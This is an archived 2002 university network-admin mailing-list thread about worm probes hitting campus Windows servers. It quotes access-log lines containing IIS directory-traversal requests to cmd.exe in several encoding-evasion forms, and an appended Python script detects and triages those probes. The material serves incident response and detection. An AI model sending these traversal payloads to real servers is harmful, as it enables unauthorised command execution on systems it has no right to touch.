I own one of them and am also in the process of cleaning it up. (llc.msu.edu server)
This server had only been online for a few hours before being struck. Owch!
My apologies for any inconvenience.

MVK

>I own three of them (.nscl.msu.edu machines) and am cleaning them up ASAP.
>
>Thanks for the info. Sorry for any inconvenience.
>
>Katie Clark
>Computer Support
>National Superconducting Cyclotron Laboratory
>Michigan State University
>(517) 333-6338
>
>-----Original Message-----
>From: MSU Network Administrators Group [mailto:[log in to unmask]]On
>Behalf Of Paul Donahue
>Sent: Monday, January 21, 2002 9:27 AM
>To: [log in to unmask]
>Subject: Re: MS Virus or Worm activity
>
>
>Not to be a "me-too"er but I have noticed the same from the same IP
>addresses on one of our Windows boxes. ZoneAlarm showed approximately
>400 alerts since 6pm Friday until 8am this morning.
>
>
>Paul Donahue
>Lead Computer/Network Technician
>CVM Information Technology Center
>A227 VMC, Michigan State University
>Phone: 353-5551 Fax: 432-2937
>
>>>> [log in to unmask] 01/21/02 08:51AM >>>
>Probes from these hosts started coming in just before 11:00pm Saturday
>night:
>
>35.8.164.90 - bigone.hrt.msu.edu
>35.8.33.189 - fpc04.nscl.msu.edu
>35.8.34.114 - cycpc54.nscl.msu.edu
>35.8.33.203 - talon.nscl.msu.edu
>35.8.107.198 - No host name in DNS. Domain: llc, Language Learning Center in Old Hort
>
>
>Probe examples:
>
>35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286
>35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
>35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
>35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
>35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
>35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
>35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
>35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
>35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
>35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
>35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
>35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
>35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
>35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
>35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
>
>--
>Gene Willacker, Systems Analyst
>MSU Division of Housing and Food Service
>Food Stores Building
>171 Service Road
>East Lansing, MI 48824-1233
>517-353-1691

--
Michael V. Kramizeh
Language Laboratory Manager
Language Learning Center
Michigan State University
Rm. 131 Old Horticulture Bldg.
East Lansing, MI 48824
517-355-7587 Phone
517-432-5246 Fax
E-Mail: [log in to unmask]
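
Added example, not part of the thread and not written by any of its participants: a Python triage pass over access logs like the ones quoted above. It normalises each request path (repeated percent-decoding, lenient folding of two-byte overlong sequences, backslash folding), counts per source the requests that resolve to cmd.exe or root.exe, and lists any that were answered with a status below 400. The 198.51.100.7 and 192.0.2.10 lines are constructed sample data; the other sample lines are copied from the quoted probes.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
OVERLONG = re.compile(rb'[\xc0\xc1](.)', re.S)  # 2-byte overlong forms of ASCII
TARGETS = ('/cmd.exe', '/root.exe')

# First four lines come from the quoted probes; the last two are constructed.
SAMPLE_LOG = r'''
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
198.51.100.7 - - [21/Jan/2002:09:02:41 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1291
192.0.2.10 - - [21/Jan/2002:09:05:10 -0500] "GET /index.html HTTP/1.0" 200 1043
'''.strip().splitlines()

def normalise(url, max_rounds=4):
    """Percent-decode until stable, fold overlong UTF-8 and backslashes."""
    raw = url.split('?', 1)[0].encode('latin-1', 'replace')
    for _ in range(max_rounds):
        step = unquote_to_bytes(raw)
        # Lenient decode ((b0 & 0x1f) << 6) | (b1 & 0x3f): C0 AF -> '/', C1 1C -> '\'
        step = OVERLONG.sub(
            lambda m: bytes([((m[0][0] & 0x1f) << 6) | (m[1][0] & 0x3f)]), step)
        if step == raw:
            break
        raw = step
    return raw.decode('latin-1').replace('\\', '/').lower()

def scan(lines):
    """Return {source_ip: {'probes': n, 'served': [paths with status < 400]}}."""
    hits = defaultdict(lambda: {'probes': 0, 'served': []})
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        ip, url, status = m[1], m[2], int(m[3])
        path = normalise(url)
        if path.endswith(TARGETS):
            hits[ip]['probes'] += 1
            if status < 400:  # not rejected by the server: triage this host first
                hits[ip]['served'].append(path)
    return dict(hits)

if __name__ == '__main__':
    for ip, info in scan(SAMPLE_LOG).items():
        print(ip, info['probes'], 'probes;', len(info['served']), 'not rejected')
```
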